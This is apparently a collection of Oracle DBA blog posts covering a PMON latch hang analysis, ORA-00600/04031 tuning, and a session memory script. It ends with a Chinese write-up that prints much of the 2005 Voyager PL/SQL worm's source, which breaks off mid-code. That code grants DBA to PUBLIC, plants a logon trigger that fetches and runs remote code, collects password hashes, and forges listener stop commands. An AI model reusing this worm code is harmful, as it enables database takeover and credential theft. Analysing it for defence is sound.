pmon长期持有cache buffers chains导致实例hang住一例

前几日,有客户报一个备用库实例中有多个回话hang住的问题,在hang住前本地有维护人员执行了truncate表的操作。
同事前往客户现场进一步确认了问题,并传回了当时hang状况下的266级systemstate文件。该实例的并发回话数量较少,所以实例状态抓取后总的信息量并不多,这种情形中通过分析systemstate信息往往要好于分析hanganalyze信息。
通过著名的源自于metalink的ass awk脚本可以很快找出各进程的状态,以及重要资源的持有者:
awk -f ass109.awk systemstate.txt

Starting Systemstate 1
…………………………………..
Ass.Awk Version 1.0.9 – Processing systemstate.txt

System State 1
~~~~~~~~~~~~~~~~
1:
2: last wait for ‘pmon timer’
3: waiting for ‘rdbms ipc message’ wait
4: waiting for ‘rdbms ipc message’ wait
5: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW0
6: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW1
7: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait DBW2
8: waiting for ‘rdbms ipc message’ wait
9: waiting for ‘rdbms ipc message’ wait
10: waiting for ‘rdbms ipc message’ wait
11: waiting for ‘enq: RO – fast object reuse'[Enqueue RO-0001000B-00000001] wait
12: waiting for ‘rdbms ipc message’ wait
13: waiting for ‘rdbms ipc message’ wait
14: waiting for ‘rdbms ipc message’ wait
15: waiting for ‘rdbms ipc message’ wait
16: waiting for ‘SQL*Net message from client’ wait
17: waiting for ‘SQL*Net message from client’ wait
18: waiting for ‘SQL*Net message from client’ wait
19: waiting for ‘latch: cache buffers chains'[Latch 70000048c8c66b0] wait
20: waiting for ‘SQL*Net message from client’ wait
21: waiting for ‘SQL*Net message from client’ wait
22: last wait for ‘SQL*Net message from client’ [DEAD]
Cmd: Delete
23: waiting for ‘SQL*Net message from client’ wait
24: waiting for ‘SQL*Net message from client’ wait
25:
26: waiting for ‘SQL*Net message from client’ wait
27: last wait for ‘ksdxexeotherwait’
28: waiting for ‘enq: TX – row lock contention'[Enqueue TX-00120003-00002CC0] wait
Cmd: Update
29: waiting for ‘SQL*Net message from client’ wait
30: waiting for ‘SQL*Net message from client’ wait
31: waiting for ‘SQL*Net message from client’ wait
32: waiting for ‘SQL*Net message from client’ wait
33: waiting for ‘SQL*Net message from client’ wait
34: waiting for ‘Streams AQ: qmn coordinator idle wait’ wait
35: for ‘Streams AQ: waiting for time management or cleanup tasks’ wait
36: waiting for ‘Streams AQ: qmn slave idle wait’ wait
37: waiting for ‘enq: RO – fast object reuse'[Enqueue RO-00010025-00000001] wait
38: waiting for ‘SQL*Net message from client’ wait
39: waiting for ‘SQL*Net message from client’ wait
41: waiting for ‘SQL*Net message from client’ wait
42: last wait for ‘enq: TX – row lock contention’ wait
Blockers
~~~~~~~~

Above is a list of all the processes. If they are waiting for a resource
then it will be given in square brackets. Below is a summary of the
waited upon resources, together with the holder of that resource.
Notes:
~~~~~
o A process id of ‘???’ implies that the holder was not found in the
systemstate.

Resource Holder State
Latch 70000048c8c66b0 ??? Blocker
Enqueue RO-0001000B-00000001 10: waiting for ‘rdbms ipc message’
Enqueue RO-0001000B-00000001 11: 11: is waiting for 10: 11:
Enqueue TX-00120003-00002CC0 22: last wait for ‘SQL*Net message from client’
Enqueue RO-00010025-00000001 10: waiting for ‘rdbms ipc message’
Enqueue RO-00010025-00000001 37: 37: is waiting for 10: 37:

Object Names
~~~~~~~~~~~~
Latch 70000048c8c66b0 holding (efd=14) 70000048c8c66b0 Child ca
Enqueue RO-0001000B-00000001
Enqueue TX-00120003-00002CC0
Enqueue RO-00010025-00000001

首先注意到的是RO队列锁,RO即(REUSE OBJECT),该锁用以协调前台进程与后台进程DBWR和CKPT之间的工作,该队列一般只在drop或truncate对象时可见到。可以看到pid为11和37的进程均在等待pid为10的进程,因为pid=10的进程持有着它们锁需要的RO-0001000B-00000001和RO-00010025-00000001,分析dump文件可以发现该持有进程正是CKPT后台进程;

而该检查点进程也处于BUSY的非空闲等待中,其等待事件为’rdbms ipc message’,即它在等待另一个后台进程给它发送信息。这个时候我们来观察其他忙碌的后台进程可以发现,pid为5,6,7的进程均在等待同一个栓’latch: cache buffers chains'[Latch 70000048c8c66b0];这个三个进程均为DBWR进程,此外还有一个DBW3进程处于’rdbms ipc message’等待中,多个DBWR进程是由于设置了db_writer_processes参数;看起来是ckpt进程准备对需要truncate的对象做对象级别的检查点,以保证该对象所有脏块均已写到磁盘上,所以对dbwr进程发出需要写出的message,继而进入’rdbms ipc message’等待直到dbwr进程完成写出任务,但由于dbwr进程长期无法获取某脏块对应的latch: cache buffers chains,故写出工作一直处于pending状态,这样一个hang链就十分清晰了。

我们来分析’latch: cache buffers chains'[Latch 70000048c8c66b0]这个栓,ass分析systemstate dump时将该栓的holder归为’???’,即无法自dump文件中找到该栓的持有者;进一步直接分析dump文件可以发现:
PROCESS 2:
—————————————-
SO: 70000048f529d40, type: 2, owner: 0, flag: INIT/-/-/0x00
(process) Oracle pid=2, calls cur/top: 70000047d0e75a0/70000048f8956d0, flag: (e) SYSTEM
int error: 0, call error: 0, sess error: 0, txn error 0
(post info) last post received: 504403177803376304 122 2
last post received-location: kslges
last process to post me: 70000048e533a88 1 6
last post sent: 0 0 148
last post sent-location: ktmpsm
last process posted by me: 70000048e535228 1 22
(latch info) wait_event=0 bits=2
holding (efd=14) 70000048c8c66b0 Child cache buffers chains level=1 child#=61214
Location from where latch is held: kcbgcur: kslbegin:
Context saved from call: 336311247
state=busy(exclusive) (val=0x2000000000000002) holder orapid = 2
waiters [orapid (seconds since: put on list, posted, alive check)]:
5 (480, 1278471465, 0)
6 (480, 1278471465, 0)
19 (480, 1278471465, 0)
7 (216, 1278471465, 0)
waiter count=4
Process Group: DEFAULT, pseudo proc: 70000048e5f91d8
O/S info: user: oracle, term: UNKNOWN, ospid: 74476
OSD pid info: Unix process pid: 74476, image: oracle@DR_570 (PMON)

可以看到pid=2的PMON进程holding 该cache buffers chains子栓,而dbwx进程即waiters 5,6,7;

一般情况下pmon是不会去持有类似于cache buffers chains子栓这样的低级栓的,除非在cleanup失败会话或关闭实例情况下。从ass分析信息来看,当时确实有一个进程处于DEAD状态,即22: last wait for ‘SQL*Net message from client’ [DEAD],而该会话最后所做的是delete from “LINC”.”MSDB_ACCGL” t操作。

虽然无法证明,但极有可能是22号进程在进行delete过程中发生会话失败,PMON进程尝试清理该进程,并获取了相关栓。但该进程始终没有被杀死,即便使用OS 命令:kill -9 处理该进程后仍可以在systemstate中找到该进程的信息。据同事分析,当时之前曾有一度PMON的CPU使用率达到100%,之后PMON进程进入’pmon timer’空闲等待,且一直没有释放对应子栓,令DBWR进程处于长期无法获得栓资源的进而hang住的状态。

在MOS上搜索PMON+cache buffers chains可以发现几个PMON长期持有该类子栓且从不释放的Bug,但版本为Oracle 8等较老版本,且都是不能reproduceable的case。谨以录之:

Hdr: 4126734 8.1.7.4.0 RDBMS 8.1.7.4.0 BUFFER CACHE PRODID-5 PORTID-59
Abstract: ORACLE PROCESS GOES TO CPU LOOP WHILE HOLDING “CHILD CACHE BUFFERS CHAINS” LATCH

*** 01/17/05 07:08 pm ***
TAR:
—-
4249496.999

PROBLEM:
——–
1. Clear description of the problem encountered:

Oracle process goes to CPU loop while holding “Child cache buffers chains

level=1” latch. This condition causes other processes to wait on
either “latch free” or “Child cache buffers chains” which completely hang

the instance.

When looping Oracle process is killed, PMON also goes to CPU loop
cleaning
up that process. PMON also hold the same “Child cache buffers chains
level=1” latch while instance continues to hang.

Hang disappear only after instance is bounced.

2. Pertinent configuration information (MTS/OPS/distributed/etc)

11i Apps Install (version 11.5.9.) running on Oracle 8.1.7.4.0 database.

3. Indication of the frequency and predictability of the problem

Process running pl/sql procedure doing dbms_lob.instr() and
dbms_lob.read()
seem to encounter this problem.

4. Sequence of events leading to the problem

5. Technical impact on the customer. Include persistent after effects.

In a bad day, ct encounters 2 occurence of this problem a day causing
loss
of service in peak processing period.

DIAGNOSTIC ANALYSIS:
——————–
1. Got 3 systemstate dumps while hang is occuring
2. Got 3 errorstack dumps of PMON while it is looping in CPU

WORKAROUND:
———–
bounce instance

RELATED BUGS:
————-
bug 2361194

REPRODUCIBILITY:
—————-
– always reproducible on test system at ct site.

TEST CASE:
———-
– unable to reproduce on 8.1.7.4.0 test system in-house

STACK TRACE:
————
PMON stack while looping:
ksedmp ksdxfdmp ksdxcb sspuser _sigreturn kggchk kcbso1 kcbpsod kcbsod
kssxdl kssdch ksudlc kssxdl ksudlp kssxdl ksuxdl ksuxda ksucln ksbrdp
opirip opidrv sou2o main $START$

SUPPORTING INFORMATION:
———————–
Customers running Release 11i of the E-Business Suite will be entitled
to complimentary Extended Maintenance Support through July 31, 2005.

ocfs certification with 11gr2 rac

We are planning to implement 11gR2 RAC on OCFS2 file system. We are going to have ocr files,voting disk files,database files and flash recovery area files on OCFS2 file system.
Generic Note
————————
ocfs2 is certified for oracle 11gr2 but oracle recommends using asm.
please see this for more information http://download.oracle.com/docs/cd/E11882_01/install.112/e10812/storage.htm#CWLIN262
3.1.3 Supported Storage Options
The following table shows the storage options supported for storing Oracle Clusterware and Oracle RAC files.

Note:

For information about OCFS2, refer to the following Web site:
http://oss.oracle.com/projects/ocfs2/
If you plan to install an Oracle RAC home on a shared OCFS2 location, then you must upgrade OCFS2 to at least version 1.4.1, which supports shared writable mmaps.

For OCFS2 certification status, and for other cluster file system support, refer to the Certify page on My Oracle Support.

Table 3-1 Supported Storage Options for Oracle Clusterware and Oracle RAC
Linux x86-64
11gR2 RAC
RAC for LinuxRAC Technologies Compatibility Matrix (RTCM) for Linux platforms.

http://www.oracle.com/technology/products/database/clustering/certify/tech_generic_linux_new.html

Note 183408.1 Raw Devices and Cluster Filesystems With Real Application Clusters
Note 238278.1 How to find the current OCFS or OCFS2 version for Linux
Note 811306.1 RAC Assurance Support Team: RAC Starter Kit and Best Practices (Linux)

ORA-00600: INTERNAL ERROR CODE, ARGUMENTS: [729], [10992], [SPACE LEAK] Example

The customers got  this error every alternative days on Version  9.2.0.7. They did increase the shared pool from 450MB to 704MB. Let’s see the alert.log and the last generated trace file.

SQL> l
1  select  nam.ksppinm NAME,
2  val.KSPPSTVL VALUE
3  from x$ksppi nam,
4  x$ksppsv val
5  where nam.indx = val.indx
6  and  nam.ksppinm like '%shared%'
7* order by 1
SQL> /

NAME                                                              VALUE
----------------------------------------------------------------  ----------
_all_shared_dblinks
_shared_pool_reserved_min_alloc                                   4400
_shared_pool_reserved_pct                                         5
hi_shared_memory_address                                          0
max_shared_servers                                                20
shared_memory_address                                             0
shared_pool_reserved_size                                         31876710
shared_pool_size                                                  738197504
shared_server_sessions                                            0
shared_servers                                                    0

10 rows selected.

SQL>  select FREE_SPACE,LAST_FAILURE_SIZE,REQUEST_FAILURES,LAST_MISS_SIZE  from v$shared_pool_reserved;

FREE_SPACE LAST_FAILURE_SIZE  REQUEST_FAILURES LAST_MISS_SIZE
---------- -----------------  ---------------- --------------
19018368               456               725              0

1 row selected.

Alert log
~~~~~~~~~~
Thu May 28 19:05:11 2009
Errors in file  /u01/app/oracle/admin/preg062/udump/preg062_ora_17314.trc:
ORA-00600:  internal error code, arguments: [729], [10992], [space leak], [], [],  [], [], []

Trace File
~~~~~~~~~~~
Dump file  /u01/app/oracle/admin/preg062/udump/preg062_ora_17314.trc
Oracle9i  Enterprise Edition Release 9.2.0.7.0 - 64bit Production
With the  Partitioning, OLAP and Oracle Data Mining options
JServer Release  9.2.0.7.0 - Production
ORACLE_HOME =  /u01/app/oracle/product/920preg062
System name:	SunOS
Node name:	 iccscorp
Release:	5.9
Version:	Generic_122300-22
Machine:	sun4u
Instance  name: preg062

Error
-----
ORA-00600: internal error code,  arguments: [729], [10992], [space leak], [], [], [], [], []

Current  SQL
-----------
None

Call Stack
----------
ksedmp  kgeriv kgesiv ksesic2 ksmuhe ksmugf ksuxds ksudel opilof opiodr ttcpip  opitsk opiino opiodr opidrv sou2o main start

Session info
------------
SO:  411536570, type: 4, owner: 40e583e08, flag: INIT/-/-/0x00
(session) trans: 0, creator: 40e583e08, flag: (41) USR/- BSY/-/-/DEL/-/-
DID: 0001-00F9-00000F5B, short-term DID:  0000-0000-00000000
txn branch: 0
oct:  0, prv: 0, sql: 417fbbf18, psql: 416fa9840, user: 31/MATRIXTWO
O/S info: user: matrixadmin, term: , ospid: 17281, machine: iccscorp
program: mql@iccscorp (TNS V1-V3)
last wait for  'SQL*Net message from client' blocking sess=0x0 seq=3208 wait_time=836
driver id=54435000, #bytes=1, =0

ORA-04031  details
~~~~~~~~~~~~~
Begin 4031 Diagnostic Information

Allocation  Request
-------------------
Allocation request for: kkslpkp -  literal info.
Heap: 3d6fb45f0, size: 4200

Call stack
-----------
ksm_4031_dump   ksmasg  kghnospc  kghalp  kghsupmm  kghssgai  kkslpkp  kkslpgo  kkepsl   kkecdn  kkotap  kkoiqb  kkooqb  kkoqbc  apakkoqb
apaqbd  apadrv   opitca  kkssbt  kksfbc  kkspfda  kpodny  kpoal8  opiodr  ttcpip  opitsk   opiino  opiodr  opidrv  sou2o  main

Session Info
-------------
SO:  411536570, type: 4, owner: 40e583e08, flag: INIT/-/-/0x00
(session) trans: 0, creator: 40e583e08, flag: (41) USR/- BSY/-/-/-/-/-
DID: 0001-00F9-00000F5B, short-term DID: 0000-0000-00000000
txn branch: 0
oct: 0, prv: 0, sql: 4311e4e30,  psql: 4311e4e30, user: 31/MATRIXTWO
O/S info: user: matrixadmin,  term: , ospid: 17281, machine: iccscorp
program:  mql@iccscorp (TNS V1-V3)
application name: mql@iccscorp (TNS  V1-V3), hash value=0
last wait for 'SQL*Net message from client'  blocking sess=0x0 seq=3196 wait_time=1975
driver  id=54435000, #bytes=1, =0

Number of Subpools and allocations
----------------------------------
===============================
Memory  Utilization of Subpool 1
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    25065216
"miscellaneous             "    14914048

===============================
Memory  Utilization of Subpool 2
===============================
Allocation Name          Size
_________________________   __________
"free memory              "     9306608
"miscellaneous             "    19358000

===============================
Memory  Utilization of Subpool 3
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    25209192
"miscellaneous             "    10192440

===============================
Memory  Utilization of Subpool 4
===============================
Allocation Name          Size
_________________________   __________
"free memory              "    15005800
"miscellaneous             "    11097176

LIBRARY CACHE STATISTICS:
namespace            gets hit ratio      pins hit ratio    reloads   invalids
--------------  --------- --------- --------- --------- ---------- ----------
CRSR            400143894     0.951 1821611655     0.969   10619950      63892
TABL/PRCD/TYPE  230543353     0.996 255666572     0.934    7504796          0

Connection  Mode & Relevant parameters
--------------------------------------
sga_max_size       = 3159332528
shared_pool_size =  738197504
db_cache_size       =  956301312
cursor_sharing      = SIMILAR
pga_aggregate_target  = 2097152000

It seems the ORA-04031 is the main issue, which triggered the ORA-00600 [729] error, after the session got abnormally terminated or killed.

Memory request failed on “shared pool” while trying to allocate 4200 bytes even though you have 9 to 25 mb of free space in 4 subpools.

I have reviewed the alert, trace and RDA report and following are my findings.

# Shared_pool_size is 738197504 and 4 subpools are used.
# Memory request failed for 4200 bytes.
# None of the components in subpools are showing any abnormal growth.

Suggestion
—————-
Issue is not exactly matching with any known bugs. Modifying the memory related parameters will help to avoid these errors.

1) Reduce the number of subpools to 2 from 4, by setting “_kghdsidx_count”=2 and restart the database. This will also help to reduce the shared pool fragmentation. Refer Note 396940.1

SQL> alter system set “_kghdsidx_count”=2 scope=spfile;

2) I have checked the memory request failure which is showing the size of 4200 bytes plus.
Set the _shared_pool_reserved_min_alloc=4000 which will help to allocate memory in reserved area, if the request is greater than 4000 bytes.

alter system set “_shared_pool_reserved_min_alloc”=4000 scope=spfile;

3) Set the shared_pool_reserved_size to 10 to 15 % of the shared pool size, by setting _shared_pool_reserved_pct parameter.

SQL> alter system set “_shared_pool_reserved_pct”=10 scope=spfile;

Implement the above changes and restart the database. This will help to avoid the shared pool fragmentation and helps to avoid the ORA-04031/ORA-00600 [729] errors.

After applying above change ,the error has not occured  again.

Script To Monitor RDBMS Session UGA and PGA Current And Maximum Usage Over Time

Script

set echo off;
set feedback off;
set heading off;
set linesize 128;
set show off;
set pagesize 55;
set trimspool on;
set verify off;
column "SID AND SERIAL#" FORMAT A19
col SNAP_COLUMN new_value SNAP_TIME
col SNAP_EOF_NAME new_value EOF_NAME
col SNAP_HOST_NAME new_value THE_HOST_NAME
col SNAP_INSTANCE_NAME new_value THE_NAME_OF_THE_INSTANCE
col SNAP_RDBMS_VERSION new_value THE_RDBMS_VERSION
set term off;
select to_char(sysdate,'YYYYMMDD_HH24MISS') "SNAP_COLUMN" from dual;
select trim(host_name) "SNAP_HOST_NAME" from v$instance;
select trim(instance_name) "SNAP_INSTANCE_NAME" from v$instance;
select trim(version) "SNAP_RDBMS_VERSION" from v$instance;
select '&THE_NAME_OF_THE_INSTANCE'||'_'||'&SNAP_TIME'||'.LST' "SNAP_EOF_NAME" from dual;
drop table maxpgauga;
create table maxpgauga as select s.sid,
s2.serial#,
n.name,
s.value,
decode(s2.username,null,s2.program,s2.username) "USERNAME",
s2.logon_time
from   v$statname n,
v$sesstat s,
v$session s2
where  n.statistic# = s.statistic# and
(s.sid = s2.sid) and
name like 'session%memory max%';
drop table curpgauga;
create table curpgauga as select s.sid,
s2.serial#,
n.name,
s.value,
decode(s2.username,null,s2.program,s2.username) "USERNAME",
s2.logon_time
from   v$statname n,
v$sesstat s,
v$session s2
where  n.statistic# = s.statistic# and
(s.sid = s2.sid) and
name like 'session%memory' and
name not like 'session%memory max%';
set term on;

spool ORACLE_MEMORY_USAGE_SNAPSHOT_&EOF_NAME

select ‘Oracle Memory Usage Report: PGA And UGA Memory Usage Per Session’ from dual;
select ‘Host……..: ‘||’&THE_HOST_NAME’ from dual;
select ‘Name……..: ‘||’&THE_NAME_OF_THE_INSTANCE’ from dual;
select ‘Version…..: ‘||’&THE_RDBMS_VERSION’ from dual;
select ‘Startup Time: ‘||to_char(min(logon_time),’YYYY-MM-DD HH24:MI:SS’) from curpgauga;
select ‘Current Time: ‘||to_char(sysdate,’YYYY.MM.DD-HH24:MI:SS’) from dual;
select ‘Worst possible value of concurrent PGA + UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
sum(value),
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
group by sid,
serial#,
username,
logon_time
order by sum(value) desc;
set heading off
select ‘Worst possible total and average values of concurrent PGA + UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||trunc(count(*)/2)||’ sessions.’ from maxpgauga;
select ‘Approximate value of current PGA + UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
sum(value),
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
group by sid,
serial#,
username,
logon_time
order by sum(value) desc;
set heading off
select ‘Current total and average values of concurrent PGA + UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||trunc(count(*)/2)||’ sessions.’ from curpgauga;
select ‘Maximum value of PGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
where    name like ‘session pga memory max%’
order by value desc, sid desc;
set heading off
select ‘Worst possible total and average values of concurrent PGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from maxpgauga where name like ‘session pga memory max%’;
select ‘Maximum value of UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
where    name like ‘session uga memory max%’
order by value desc, sid desc;
set heading off
select ‘Worst possible total and average values of concurrent UGA memory usage:’  from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from maxpgauga where name like ‘session uga memory max%’;
select ‘Current value of PGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
where    name like ‘session pga memory%’
order by value desc, sid desc;
set heading off
select ‘Current total and average values of concurrent PGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from curpgauga where name like ‘session pga memory%’;
select ‘Current value of UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
where    name like ‘session uga memory%’
order by value desc, sid desc;
set heading off
select ‘Current total and average values of concurrent UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from curpgauga where name like ‘session uga memory%’;
select ‘Current SGA structure sizings:’ from dual;
show sga
select ‘Some initialization parameter values at instance startup:’ from dual;
select trim(name)||’=’||value
from v$parameter
where name in (‘__shared_pool_size’,
‘large_pool_size’,
‘pga_aggregate_target’,
‘sga_target’,
‘shared_pool_size’,
‘sort_area_size’,
‘streams_pool_size’) order by name;
select ‘Current Time: ‘||TO_CHAR(sysdate,’YYYY.MM.DD-HH24:MI:SS’) from dual;
spool off
set feedback on;
set heading on;
set linesize 80;
set pagesize 14;
set verify on;
set echo on;

Oracle Memory Usage Report: PGA And UGA Memory Usage Per Session

 

Oracle Voyager Worm 一段匿名块SQL蠕虫

2005年12-20日(很久以前)一位匿名用户在邮件列表中发布了一段匿名块的SQL蠕虫病毒,这可能是人们第一次意识到PL/SQL也能用来写病毒。很多专家都对该段程序进行了分析,其主要破坏行为如下:

1.将DBA权限授予public角色

2.删除名为aa的trigger

3.创建名为aa的数据库登陆后(after database logon)触发器,该触发器还包含了使用UTL_TCP包(前提是病毒所在实例可能链接到外网)获取来自于http://www.google.de/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%27m+Feeling+Lucky的疑似病毒信息,google已经将该地址屏蔽了

4.通过smtp01.us.oracle.com邮件发送服务器发送标题为(Password hashes)包含数据库密码哈希值的邮件至 larry@oracle.com(可能是Oracle老总larry ellison 邮箱地址)

5.扫描实例所在主机子网中的所有ip,之后会尝试使用随机ip.修改listener.log,并且将”alter user mdsys identified by mdsys”添加至glogin.sql,每次使用SQLPLUS时均会执行该SQL.

6.创建可能的数据库连接(DBLINK),并尝试猜测密码组合,如(system/manager, sys/change_on_install, dbsnmp/dbsnmp, outln/outln, scott/tiger, mdsys/mdsys, ordcommon/ordcommon)等较为常见的组合。

7.尝试关闭listener

这是一种尝试,首先向我们证明了PL/SQL也具备编写病毒程序的能力;其次Oracle可能并不如我们想象的那么安全。

有兴趣可以瞻仰一下这段代码,oracle worm voyager.

--##s
tartc0GtJBi1
DECLARE

i1 INTEGER;
i2 INTEGER;
i6 INTEGER;

iHostToSearchFor INTEGER;

reference_ip varchar2(1000);
reference_url varchar2(1000);

starting_ipaddress varchar2(100);
current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);

c   UTL_TCP.CONNECTION;
c1   UTL_TCP.CONNECTION;
ln integer;

vLen NUMBER;

PreviousSID varchar2(100);

vWorking varchar2(2500);
vWorking1 varchar2(2500);
vRequest varchar2(500);
vRequestStop varchar2(500);
vReqLog raw(500);
vRequestSQLCommand raw(32000);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;
oraclehome varchar2(1000);
vRefresh varchar2(2000);
v_message      VARCHAR2(32000);

vRequestLogChange raw(10000);
vRequestLogReset raw(10000);

iLoop integer := 0;
iLength integer := 0;
cur binary_integer;

BEGIN

   BEGIN
      CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');
   EXCEPTION
      WHEN OTHERS THEN
         DBMS_OUTPUT.PUT_LINE('');
   END;

reference_ip := 'www.google.com';
reference_url := '/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%
27m+Feeling+Lucky';

vRefresh := 'declare req Utl_Http.Req;resp Utl_Http.Resp;v_msg varchar2(32767);af
varchar2(32767);ab varchar2(32767);ac varchar2(32767) := ''''' || reference_ip
|| ''''';v_url varchar2(32767) := ''''' || reference_url || ''''';ad varchar2
(32000) := ''''--##startc0GtJBi1'''';ae varchar2(32000) := ''''--##endc0GtJBi1'''';i3
INTEGER;i4 INTEGER;iLoop integer := 0;cur binary_integer;i binary_integer;begin
Utl_Http.Set_Proxy(proxy=>ac,no_proxy_domains=>ac );req := Utl_Http.Begin_Request
(url=>v_url,method=>''''GET'''' );utl_Http.Set_Header(r=>req,name=>''''User-
Agent'''',value=>''''Mozilla/4.0'''' );resp:=Utl_Http.Get_Response(r=>req);begin loop
Utl_Http.Read_Text(r=>resp,data=>v_msg);af:=af || v_msg;end loop;exception when
utl_Http.End_Of_Body then null;end;Utl_Http.End_Response(r=>resp);i3:=instr
(af,ad,1);i4:=instr(af,ae,i3);ab:=substr(af,i3+length(ad)+2,i4-(i3+length(ad)
+4));execute immediate ''''begin '''' || ab || '''' end;''''; end;';
vWorking := 'create or replace trigger aa AFTER LOGON ON DATABASE declare cur
binary_integer;BEGIN if round(dbms_random.value(1,100))=32 then EXECUTE IMMEDIATE '''
|| vRefresh || ''';end if;end;';

BEGIN
   EXECUTE IMMEDIATE 'drop trigger aa';
EXCEPTION
   WHEN OTHERS THEN
      DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;

BEGIN
   EXECUTE IMMEDIATE vWorking;
EXCEPTION
   WHEN OTHERS THEN
      DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;

starting_ipaddress := utl_inaddr.get_host_address;
current_ipaddress := starting_ipaddress;
ln := length(current_ipaddress);

loop
   current_letter := substr(current_ipaddress, ln, 1);
   ln := ln - 1;
   EXIT WHEN current_letter = '.';
   EXIT WHEN ln = 0;
end loop;

current_network := substr(current_ipaddress, 1, ln);

iHostToSearchFor := 1;

vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) || chr
(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))';

vRequestStop := chr(0) || chr(87) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) ||
chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(29) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=stop))';

vReqLog := UTL_RAW.CONCAT( hextoraw('00'), hextoraw('A2'), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(122) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(104) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_directory)(ARGUMENTS=)(SERVICE=)))'));

DECLARE
   a DBA_USERS.username%TYPE;
   b DBA_USERS.password%TYPE;

   CURSOR T1Cursor IS
      SELECT username, password
      FROM DBA_USERS;
BEGIN
   OPEN T1Cursor;
   LOOP
      FETCH T1Cursor INTO a, b;
      EXIT WHEN T1Cursor%NOTFOUND;
      v_message := v_message || a || ' ' ||  b || CHR(13) || CHR(10);
   END LOOP;
   CLOSE T1Cursor;
END;

loop
begin

   if MOD(iHostToSearchFor + 1, 100) = 0 then

      declare
